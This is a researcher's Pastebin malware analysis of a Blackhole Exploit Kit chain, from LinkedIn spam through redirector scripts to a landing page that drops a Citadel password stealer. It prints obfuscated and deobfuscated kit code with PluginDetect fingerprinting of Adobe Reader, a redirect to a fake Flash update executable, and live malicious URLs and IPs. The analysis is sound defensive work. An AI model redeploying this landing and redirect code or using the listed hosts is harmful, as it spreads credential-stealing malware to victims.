Advertisement
unixfreaxjp

BHEK2 w/ e,f PluginDetect Param, Drop Trojan/Stealer/DLoader

Oct 17th, 2012
6,609
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ===========================================
  2. #MalwareMustDie!!!!!!!!!!
  3. INFECTION OF CITADEL WITH BHEK
  4. BHEK IS USING PARAMETER e & f
  5. Exploit Method: AcroPDF.PDF
  6. Payload download Method: Msxml2.XMLHTTP
  7. Payload : Citadel/Trojan Password/InfoStealer
  8. VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/
  9. ===========
  10. Only VT6/43 !!!!
  11. ==========
  12. DrWeb : Trojan.PWS.Stealer.946
  13. Norman : W32/Krypt.GB
  14. McAfee-GW-Edition : PWS-Zbot.gen.aln
  15. McAfee : PWS-Zbot.gen.aln
  16. Fortinet : W32/Kryptik.WDV!tr
  17. Panda : Suspicious file
  18. Summary:
  19. This trojan send the data of infected PC by crypted communication via
  20. HTTP to 108.178.59.34 (See network conn report below)
  21. And also downloading other malwares:
  22. * GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
  23. * GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
  24. ----------------------------
  25. Set of infected file:
  26. ----------------------------
  27. assure_numb_engineers.php 0f4f3526dd2bad681586a90fc579f6e2
  28. index.html.2 ad967ba32c54c59db0f4a947410d96f2
  29. js.js d20a786ec45f68eb56f15a589c566b27
  30. js.js.1 d20a786ec45f68eb56f15a589c566b27
  31. js.js.2 d20a786ec45f68eb56f15a589c566b27
  32. LinkEdIn-Spam.eml d8c4d95479f7a1264457a8d1b5e5f457
  33. update_flash_player.exe bb53221e4220466c876dbfad9cede066
  34. PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
  35.  
  36. ===========================================
  37. FULL ANALYSYS / #MalwareMustDie / @unixfreaxjp
  38. ===========================================
  39.  
  40. //Likedin Spam;
  41. http://pastebin.com/raw.php?i=n7rppRJY
  42. #Hint from @Xylit0l < Merci!!!!!!!!
  43.  
  44. //infected url detected:
  45. ...Privately</span></a></div></td></tr></table>
  46. (LINE 170): <a href="http://www.nikecup.net/MSmxYk/index.html" style="color:#006699;
  47. font-family:Arial,sans-serif;font-size:12px;text-decoration:none">Chase Mathis</a>
  48. ---------------------------------------
  49. //download PoC
  50. --12:24:18-- http://www.nikecup.net/MSmxYk/index.html
  51. => `index.html.2'
  52. Resolving www.nikecup.net... 62.149.131.163
  53. Connecting to www.nikecup.net|62.149.131.163|:80... connected.
  54. HTTP request sent, awaiting response... 200 OK
  55. Length: 422 [text/html]
  56. 12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422]
  57.  
  58.  
  59. --------------------------------
  60. // cat the mess
  61. <html>
  62. <table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
  63. <script type="text/javascript" src="http://alpuyecamorelos.com/dycYbDyw/js.js"></script>
  64. <script type="text/javascript" src="http://videorender.com.ar/kSWEngwv/js.js"></script>
  65. <script type="text/javascript" src="http://jbrnh.com/3ZKtSw8d/js.js"></script>
  66.  
  67. </html>
  68.  
  69. ----------------------------------
  70. // fetch the js.js, noted: referer
  71.  
  72.  
  73. --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
  74. --referer="http://www.nikecup.net/MSmxYk/index.html"
  75. --target"http://jbrnh.com/3ZKtSw8d/js.js"
  76.  
  77.  
  78. --12:30:38-- http://alpuyecamorelos.com/dycYbDyw/js.js
  79. => `js.js'
  80. Resolving alpuyecamorelos.com... 209.62.88.194
  81. Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected.
  82. HTTP request sent, awaiting response... 200 OK
  83. Length: 73 [application/javascript]
  84. 12:30:38 (2.29 MB/s) - `js.js' saved [73/73]
  85.  
  86.  
  87. --12:31:06-- http://videorender.com.ar/kSWEngwv/js.js
  88. => `js.js.1'
  89. Resolving videorender.com.ar... 174.37.144.224
  90. Connecting to videorender.com.ar|174.37.144.224|:80... connected.
  91. HTTP request sent, awaiting response... 200 OK
  92. Length: 73 [application/javascript]
  93. 12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73]
  94.  
  95.  
  96. --12:31:26-- http://jbrnh.com/3ZKtSw8d/js.js
  97. => `js.js.2'
  98. Resolving jbrnh.com... 184.168.101.248
  99. Connecting to jbrnh.com|184.168.101.248|:80... connected.
  100. HTTP request sent, awaiting response... 200 OK
  101. Length: 73 [application/x-javascript]
  102. 12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73]
  103.  
  104. // all same contents↑
  105.  
  106. -----------------------------
  107. // cat the mess (js.js)
  108.  
  109. document.location='http://108.178.59.34/links/assure_numb_engineers.php';
  110.  
  111. ----------------------------
  112. // fetch the mess, noted: referer, user agent
  113.  
  114. --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
  115. --referer="http://www.nikecup.net/MSmxYk/index.html"
  116. --target="http://108.178.59.34/links/assure_numb_engineers.php"
  117.  
  118. --12:32:46-- http://108.178.59.34/links/assure_numb_engineers.php
  119. => `assure_numb_engineers.php'
  120. Connecting to 108.178.59.34:80... connected.
  121. HTTP request sent, awaiting response... 200 OK
  122. Length: unspecified [text/html]
  123. 12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474]
  124.  
  125. ----------------------------
  126. // Voila..plugin Detect...in blurp..
  127.  
  128. <html><head><title></title></head><body><div dqa="asd"></div><scri
  129. 0-9a-z]/g,k);};g="getEleme";p=parseInt;cc="co";ss=String.fromCharC
  130. nction asd(){e=window["eval"];e(s);}ddd="ad".substr(1);sss="sub"+"
  131. (i);};g+="ntB"+"yId";</script><u id="google" 45="1b43391a(1b454545
  132. c%3r3k393p1s)31331e3o3r#3k2r2g3c3r*3k393p1s3c!3r3k393q3f^3l3k1a371
  133. @2g3l373a3b&3a213q3o3r+3b1t371g39%373i3i253o)3o37411a37#1g2r2g3c3r
  134. 37411a371g$2r2g3c3r3k(393p1b1t3f@3c1a371g3l&3k283" 37="383i3b3a18_
  135. p3q373q3r&3p211f1k1t+3o3b3q3r3o%3k12374537)1g3p3q373q#3r3p211j1t*3
  136. 3c3r3k39$3q3f3l3k1a(381e371b43@3s373o1239&213q3e3f3p+1t3f3c1a39%1g
  137. f3p2a3r!3k391a381b^44441a391g_3f3p253o3o$37411a381b(181" 40="s*1i1
  138. 3b433f$3c1a381g3f(3p2a3r3k39@1a391b1b43&391a381b45+45451e3d3b%3q2q
  139. s141e!141e16163d^3b3q2q3b3o_3p3f3l3k1s$3c3r3k393q(3f3l3k1a37@1b433
  140. :
  141. :
  142. 3o141e142n@393o3f3m3q&3f3k3d1g28+3f393q
  143. 13216331h%1e39213q3e)3f3p1t3c3l#3o1a371
  144. 1g3p3i3f@393b1a1k1b&1t3f3c1a3d+1g3i3b3k
  145. a3b3i3b_3q3b123c31$3733454539(373q393e1
  146. 21)1a3g1g3d3b#3q293i3b3j*3b3k3q3p26!412
  147. f&3c1a3d1b43+3f3c1a3d1g%3c3f3o3p3q)273e
  148. $3l3o3b1b1b(433d1g3f3k@3p3b3o3q26&3b3c3
  149. >
  150. if(020==0x10)d=document;
  151. try{(d+"523")()}catch(dsgdsg){a=d[g](gg
  152. s="";
  153. for(i=0;;i++){
  154. window.asd2();
  155. if(r){s=s+r;}else break;
  156. }
  157. a=s;
  158. s="";
  159. k="";
  160. asd3();
  161. qa=0x1e;
  162. for(i=0;i<a.length;i+=2){
  163. s+=ss(p(a[sss](i,2),qa));
  164. }
  165. asd();
  166. </script></body></html>
  167.  
  168.  
  169. --------------------------------------------------------
  170.  
  171. // deobfs the code
  172.  
  173.  
  174. try {
  175. var PluginDetect = {
  176. version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
  177. return function (){
  178. c(b, a)
  179. }
  180. }
  181. , isDefined : function (b){
  182. return typeof b != "undefined"
  183. }
  184. , isArray : function (b){
  185. return (/array/i).test(Object.prototype.toString.call(b))
  186. }
  187. , isFunc : function (b){
  188. return typeof b == "function"
  189. }
  190. , isString : function (b){
  191. return typeof b == "string"
  192. }
  193. , isNum : function (b){
  194. return typeof b == "number"
  195. }
  196. , isStrNum : function (b){
  197. return (typeof b == "string" && (/\d/).test(b))
  198. }
  199. , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,
  200. getNum : function (b, c){
  201. var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
  202. exec(b) : null;
  203. return a ? a[0] : null
  204. }
  205. , compareNums : function (h, f, d){
  206. var e = this , c, b, a, g = parseInt;
  207. if (e.isStrNum(h) && e.isStrNum(f)){
  208. if (e.isDefined(d) && d.compareNums){
  209. return d.compareNums(h, f)
  210. }
  211. c = h.split(e.splitNumRegx);
  212. b = f.split(e.splitNumRegx);
  213. for (a = 0; a < Math.min(c.length, b.length);
  214. a ++ ){
  215. if (g(c[a], 10) > g(b[a], 10)){
  216. return 1
  217. }
  218. if (g(c[a], 10) < g(b[a], 10)){
  219. return - 1
  220. }
  221. }
  222. }
  223. return 0
  224. }
  225. , formatNum : function (b, c){
  226. var d = this , a, e;
  227. if (!d.isStrNum(b)){
  228. return null
  229. }
  230. if (!d.isNum(c)){
  231. c = 4
  232. }
  233. c--;
  234. e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
  235. for (a = 0; a < 4; a ++ ){
  236. if (/^(0+)(.+)$/.test(e[a])){
  237. e[a] = RegExp.$2
  238. }
  239. if (a > c ||! (/\d/).test(e[a])){
  240. e[a] = "0"
  241. }
  242. }
  243. return e.slice(0, 4).join(",")
  244. }
  245. , $$hasMimeType : function (a){
  246. return function (c){
  247. if (!a.isIE && c){
  248. var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
  249. for (b = 0; b < d.length; b ++ ){
  250. if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
  251. f = navigator.mimeTypes[d[b]];
  252. e = f ? f.enabledPlugin : 0;
  253. if (e && (e.name || e.description)){
  254. return f
  255. }
  256. }
  257. }
  258. }
  259. return null
  260. }
  261. }
  262. , findNavPlugin : function (l, e, c){
  263. var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
  264. new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
  265. for (f = 0; f < a.length; f ++ ){
  266. m = a[f].description || g;
  267. b = a[f].name || g;
  268. if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
  269. test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
  270. if (!k ||! (k.test(m) || k.test(b))){
  271. return a[f]
  272. }
  273. }
  274. }
  275. return null
  276. }
  277. , getMimeEnabledPlugin : function (k, m, c){
  278. var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
  279. l, d, j = e.isString(k) ? [k] : k;
  280. for (d = 0; d < j.length; d ++ ){
  281. if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
  282. l = f.description || h;
  283. a = f.name || h;
  284. if (b.test(l) || b.test(a)){
  285. if (!g ||! (g.test(l) || g.test(a))){
  286. return f
  287. }
  288. }
  289. }
  290. }
  291. return 0
  292. }
  293. , getPluginFileVersion : function (f, b){
  294. var h = this , e, d, g, a, c =- 1;
  295. if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
  296. return b
  297. }
  298. if (!b){
  299. return e
  300. }
  301. e = h.formatNum(e);
  302. b = h.formatNum(b);
  303. d = b.split(h.splitNumRegx);
  304. g = e.split(h.splitNumRegx);
  305. for (a = 0; a < d.length; a ++ ){
  306. if (c >- 1 && a > c && d[a] != "0"){
  307. return b
  308. }
  309. if (g[a] != d[a]){
  310. if (c ==- 1){
  311. c = a
  312. }
  313. if (d[a] != "0"){
  314. return b
  315. }
  316. }
  317. }
  318. return e
  319. }
  320. , AXO : window.ActiveXObject, getAXO : function (a){
  321. var f = null, d, b = this , c = {
  322. }
  323. ;
  324. try {
  325. f = new b.AXO(a)
  326. }
  327. catch (d){
  328. }
  329. return f
  330. }
  331. , convertFuncs : function (f){
  332. var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
  333. for (ain f){
  334. if (b.test(a)){
  335. try {
  336. g = a.slice(2);
  337. if (g.length > 0 &&! f[g]){
  338. f[g] = f[a](f);
  339. deletef[a]
  340. }
  341. }
  342. catch (d){
  343. }
  344. }
  345. }
  346. }
  347. , initObj : function (e, b, d){
  348. var a, c;
  349. if (e){
  350. if (e[b[0]] == 1 || d){
  351. for (a = 0; a < b.length; a = a + 2){
  352. e[b[a]] = b[a + 1]
  353. }
  354. }
  355. for (ain e){
  356. c = e[a];
  357. if (c && c[b[0]] == 1){
  358. this .initObj(c, b)
  359. }
  360. }
  361. }
  362. }
  363. , initScript : function (){
  364. var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
  365. b = a.platform || "", h = a.product || "";
  366. c.initObj(c, ["$", c]);
  367. for (fin c.Plugins){
  368. if (c.Plugins[f]){
  369. c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
  370. }
  371. }
  372. ;
  373. c.OS = 100;
  374. if (b){
  375. var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
  376. 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
  377. , 100];
  378. for (f = d.length - 2; f >= 0; f = f - 2){
  379. if (d[f] && new RegExp(d[f], "i").test(b)){
  380. c.OS = d[f + 1];
  381. break
  382. }
  383. }
  384. }
  385. c.convertFuncs(c);
  386. c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
  387. "body")[0] || document.body || null);
  388. c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
  389. c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
  390. null ;
  391. c.ActiveXEnabled = false;
  392. if (c.isIE){
  393. var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
  394. "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
  395. "Scripting.Dictionary", "wmplayer.ocx"];
  396. for (f = 0; f < j.length; f ++ ){
  397. if (c.getAXO(j[f])){
  398. c.ActiveXEnabled = true;
  399. break
  400. }
  401. }
  402. }
  403. c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
  404. c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
  405. "0.9") : null;
  406. c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
  407. c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
  408. c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
  409. /Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
  410. c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
  411. RegExp.$1) : null;
  412. c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
  413. c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
  414. parseFloat(RegExp.$1, 10) : null;
  415. c.addWinEvent("load", c.handler(c.runWLfuncs, c))
  416. }
  417. , init : function (d){
  418. var c = this , b, d, a = {
  419. status :- 3, plugin : 0
  420. }
  421. ;
  422. if (!c.isString(d)){
  423. return a
  424. }
  425. if (d.length == 1){
  426. c.getVersionDelimiter = d;
  427. return a
  428. }
  429. d = d.toLowerCase().replace(/\s/g, "");
  430. b = c.Plugins[d];
  431. if (!b ||! b.getVersion){
  432. return a
  433. }
  434. a.plugin = b;
  435. if (!c.isDefined(b.installed)){
  436. b.installed = null;
  437. b.version = null;
  438. b.version0 = null;
  439. b.getVersionDone = null;
  440. b.pluginName = d
  441. }
  442. c.garbage = false;
  443. if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
  444. a.status =- 2;
  445. return a
  446. }
  447. a.status = 1;
  448. return a
  449. }
  450. , fPush : function (b, a){
  451. var c = this ;
  452. if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
  453. ])))){
  454. a.push(b)
  455. }
  456. }
  457. , callArray : function (b){
  458. var c = this , a;
  459. if (c.isArray(b)){
  460. for (a = 0; a < b.length; a ++ ){
  461. if (b[a] === null){
  462. return
  463. }
  464. c.call(b[a]);
  465. b[a] = null
  466. }
  467. }
  468. }
  469. , call : function (c){
  470. var b = this , a = b.isArray(c) ? c.length :- 1;
  471. if (a > 0 && b.isFunc(c[0])){
  472. c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
  473. }
  474. else {
  475. if (b.isFunc(c)){
  476. c(b)
  477. }
  478. }
  479. }
  480. , getVersionDelimiter : ",", $$getVersion : function (a){
  481. return function (g, d, c){
  482. var e = a.init(g), f, b, h = {
  483. }
  484. ;
  485. if (e.status < 0){
  486. return null
  487. }
  488. ;
  489. f = e.plugin;
  490. if (f.getVersionDone != 1){
  491. f.getVersion(null, d, c);
  492. if (f.getVersionDone === null){
  493. f.getVersionDone = 1
  494. }
  495. }
  496. a.cleanup();
  497. b = (f.version || f.version0);
  498. b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
  499. return b
  500. }
  501. }
  502. , cleanup : function (){
  503. }
  504. , addWinEvent : function (d, c){
  505. var e = this , a = window, b;
  506. if (e.isFunc(c)){
  507. if (a.addEventListener){
  508. a.addEventListener(d, c, false)
  509. }
  510. else {
  511. if (a.attachEvent){
  512. a.attachEvent("on" + d, c)
  513. }
  514. else {
  515. b = a["on" + d];
  516. a["on" + d] = e.winHandler(c, b)
  517. }
  518. }
  519. }
  520. }
  521. , winHandler : function (d, c){
  522. return function (){
  523. d();
  524. if (typeof c == "function"){
  525. c()
  526. }
  527. }
  528. }
  529. , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
  530. var b = {
  531. }
  532. ;
  533. a.winLoaded = true;
  534. a.callArray(a.WLfuncs0);
  535. a.callArray(a.WLfuncs);
  536. if (a.onDoneEmptyDiv){
  537. a.onDoneEmptyDiv()
  538. }
  539. }
  540. , winLoaded : false, $$onWindowLoaded : function (a){
  541. return function (b){
  542. if (a.winLoaded){
  543. a.call(b)
  544. }
  545. else {
  546. a.fPush(b, a.WLfuncs)
  547. }
  548. }
  549. }
  550. , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
  551. function (){
  552. var d = this , b, h, c, a, f, g;
  553. if (d.div && d.div.childNodes){
  554. for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
  555. c = d.div.childNodes[b];
  556. if (c && c.childNodes){
  557. for (h = c.childNodes.length - 1; h >= 0; h -- ){
  558. g = c.childNodes[h];
  559. try {
  560. c.removeChild(g)
  561. }
  562. catch (f){
  563. }
  564. }
  565. }
  566. if (c){
  567. try {
  568. d.div.removeChild(c)
  569. }
  570. catch (f){
  571. }
  572. }
  573. }
  574. }
  575. if (!d.div){
  576. a = document.getElementById(d.divID);
  577. if (a){
  578. d.div = a
  579. }
  580. }
  581. if (d.div && d.div.parentNode){
  582. try {
  583. d.div.parentNode.removeChild(d.div)
  584. }
  585. catch (f){
  586. }
  587. d.div = null
  588. }
  589. }
  590. , DONEfuncs : [], onDoneEmptyDiv : function (){
  591. var c = this , a, b;
  592. if (!c.winLoaded){
  593. return
  594. }
  595. if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
  596. return
  597. }
  598. for (ain c){
  599. b = c[a];
  600. if (b && b.funcs){
  601. if (b.OTF == 3){
  602. return
  603. }
  604. if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
  605. return
  606. }
  607. }
  608. }
  609. for (a = 0; a < c.DONEfuncs.length; a ++ ){
  610. c.callArray(c.DONEfuncs)
  611. }
  612. c.emptyDiv()
  613. }
  614. , getWidth : function (c){
  615. if (c){
  616. var a = c.scrollWidth || c.offsetWidth, b = this ;
  617. if (b.isNum(a)){
  618. return a
  619. }
  620. }
  621. return - 1
  622. }
  623. , getTagStatus : function (m, g, a, b){
  624. var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
  625. g.span, i = c.getWidth(d);
  626. if (!k ||! h ||! d ||! c.getDOMobj(m)){
  627. return - 2
  628. }
  629. if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
  630. return 0
  631. }
  632. if (l >= i){
  633. return - 1
  634. }
  635. try {
  636. if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
  637. if (!m.winLoaded && c.winLoaded){
  638. return 1
  639. }
  640. if (m.winLoaded && c.isNum(b)){
  641. if (!c.isNum(m.count)){
  642. m.count = b
  643. }
  644. if (b - m.count >= 10){
  645. return 1
  646. }
  647. }
  648. }
  649. }
  650. catch (f){
  651. }
  652. return 0
  653. }
  654. , getDOMobj : function (g, a){
  655. var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
  656. try {
  657. if (b && a){
  658. d.div.focus()
  659. }
  660. }
  661. catch (f){
  662. }
  663. return b ? c.firstChild : null
  664. }
  665. , setStyle : function (b, g){
  666. var f = b.style, a, d, c = this ;
  667. if (f && g){
  668. for (a = 0; a < g.length; a = a + 2){
  669. try {
  670. f[g[a]] = g[a + 1]
  671. }
  672. catch (d){
  673. }
  674. }
  675. }
  676. }
  677. , insertDivInBody : function (a, i){
  678. var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
  679. document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
  680. if (!g){
  681. try {
  682. j.write(c + 'div id="' + b + '">o' + c + "/div>");
  683. d = j.getElementById(b)
  684. }
  685. catch (h){
  686. }
  687. }
  688. g = (j.getElementsByTagName("body")[0] || j.body);
  689. if (g){
  690. if (g.firstChild && f.isDefined(g.insertBefore)){
  691. g.insertBefore(a, g.firstChild)
  692. }
  693. else {
  694. g.appendChild(a)
  695. }
  696. if (d){
  697. g.removeChild(d)
  698. }
  699. }
  700. else {
  701. }
  702. }
  703. , insertHTML : function (g, b, h, a, l){
  704. var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
  705. var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
  706. "0px", "visibility", "visible"];
  707. var i =
  708. "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
  709. if (!k.isDefined(a)){
  710. a = ""
  711. }
  712. if (k.isString(g) && (/[^\s]/).test(g)){
  713. g = g.toLowerCase().replace(/\s/g, "");
  714. q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
  715. q += 'style="' + i + 'display:inline;" ';
  716. for (o = 0; o < b.length; o = o + 2){
  717. if (/[^\s]/.test(b[o + 1])){
  718. q += b[o] + '="' + b[o + 1] + '" '
  719. }
  720. }
  721. q += ">";
  722. for (o = 0; o < h.length; o = o + 2){
  723. if (/[^\s]/.test(h[o + 1])){
  724. q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
  725. }
  726. }
  727. q += a + f + "/" + g + ">"
  728. }
  729. else {
  730. q = a
  731. }
  732. if (!k.div){
  733. j = n.getElementById(k.divID);
  734. if (j){
  735. k.div = j
  736. }
  737. else {
  738. k.div = n.createElement("div");
  739. k.div.id = k.divID
  740. }
  741. k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
  742. 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
  743. + "px", "verticalAlign", "baseline", "display", "block"]));
  744. if (!j){
  745. k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
  746. k.insertDivInBody(k.div)
  747. }
  748. }
  749. if (k.div && k.div.parentNode){
  750. k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
  751. pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
  752. try {
  753. p.innerHTML = q
  754. }
  755. catch (m){
  756. }
  757. ;
  758. try {
  759. k.div.appendChild(p)
  760. }
  761. catch (m){
  762. }
  763. ;
  764. return {
  765. span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
  766. }
  767. }
  768. return {
  769. span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
  770. }
  771. }
  772. , Plugins : {
  773. adobereader : {
  774. mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
  775. "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
  776. {
  777. }
  778. , pluginHasMimeType : function (d, c, f){
  779. var b = this , e = b.$, a;
  780. for (ain d){
  781. if (d[a] && d[a].type && d[a].type == c){
  782. return 1
  783. }
  784. }
  785. if (e.getMimeEnabledPlugin(c, f)){
  786. return 1
  787. }
  788. return 0
  789. }
  790. , getVersion : function (l, j){
  791. var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
  792. if (d.isString(j)){
  793. j = j.replace(/\s/g, "");
  794. if (j){
  795. k = j
  796. }
  797. }
  798. else {
  799. j = null
  800. }
  801. if (d.isDefined(g.INSTALLED[k])){
  802. g.installed = g.INSTALLED[k];
  803. return
  804. }
  805. if (!d.isIE){
  806. a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
  807. if (g.getVersionDone !== 0){
  808. g.getVersionDone = 0;
  809. b = d.getMimeEnabledPlugin(g.mimeType, a);
  810. if (!j){
  811. n = b
  812. }
  813. if (!b && d.hasMimeType(g.mimeType)){
  814. b = d.findNavPlugin(a, 0)
  815. }
  816. if (b){
  817. g.navPluginObj = b;
  818. h = d.getNum(b.description) || d.getNum(b.name);
  819. h = d.getPluginFileVersion(b, h);
  820. if (!h && d.OS == 1){
  821. if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
  822. h = "9"
  823. }
  824. else {
  825. if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
  826. h = "8"
  827. }
  828. }
  829. }
  830. }
  831. }
  832. else {
  833. h = g.version
  834. }
  835. if (!d.isDefined(n)){
  836. n = d.getMimeEnabledPlugin(k, a)
  837. }
  838. g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
  839. }
  840. else {
  841. b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
  842. c =/=\ s * ([ \ d \ .] + ) / g;
  843. try {
  844. f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
  845. ""], "", g))).GetVersions();
  846. for (m = 0; m < 5; m ++ ){
  847. if (c.test(f) && (!h || RegExp.$1 > h)){
  848. h = RegExp.$1
  849. }
  850. }
  851. }
  852. catch (i){
  853. }
  854. g.installed = h ? 1 : (b ? 0 :- 1)
  855. }
  856. if (!g.version){
  857. g.version = d.formatNum(h)
  858. }
  859. g.INSTALLED[k] = g.installed
  860. }
  861. }
  862. , zz : 0
  863. }
  864. }
  865. ;
  866. PluginDetect.initScript();
  867. PluginDetect.getVersion(".");
  868. pdfver = PluginDetect.getVersion("AdobeReader");
  869. }
  870. catch (e){
  871. }
  872. if (typeof pdfver == 'string'){
  873. pdfver = pdfver.split('.')
  874. }
  875. else {
  876. pdfver = [0, 0, 0, 0]
  877. }
  878. function x(s){
  879. d = [];
  880. for (i = 0; i < s.length; i ++ ){
  881. k = (s.charCodeAt(i) - 46).toString(16);
  882. if (k.length == 1)k = "0" + k;
  883. d.push(k);
  884. }
  885. ;
  886. return d.join("");
  887. }
  888. end_redirect = function (){
  889. window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';
  890. }
  891. ;
  892. window.onbeforeunload = function (){
  893. return "";
  894. }
  895. ;
  896. document.write('');
  897. setTimeout(end_redirect, 60000);
  898.  
  899.  
  900. ------------------------------------
  901. // infection analysis per exploit & PluginDetect hint..
  902. ===================
  903. EXPLOIT-ED BY:
  904. ===================
  905. // , Plugins : {
  906. // adobereader : {
  907. // mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
  908. // "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
  909.  
  910. ===================
  911. DOWNLOADED VIA:
  912. ===================
  913. // var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
  914. // "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
  915. // "Scripting.Dictionary", "wmplayer.ocx"];
  916. // for (f = 0; f < j.length; f ++ ){
  917. // if (c.getAXO(j[f])){
  918. // c.ActiveXEnabled = true;
  919. // break
  920.  
  921. *********** Please be noted parameter = var f, j *****************
  922.  
  923. ===================
  924. TO URL:
  925. ===================
  926. // end_redirect = function (){
  927. // window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';}
  928. //
  929.  
  930. --------------download PoC------------------------------------------------
  931.  
  932. --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
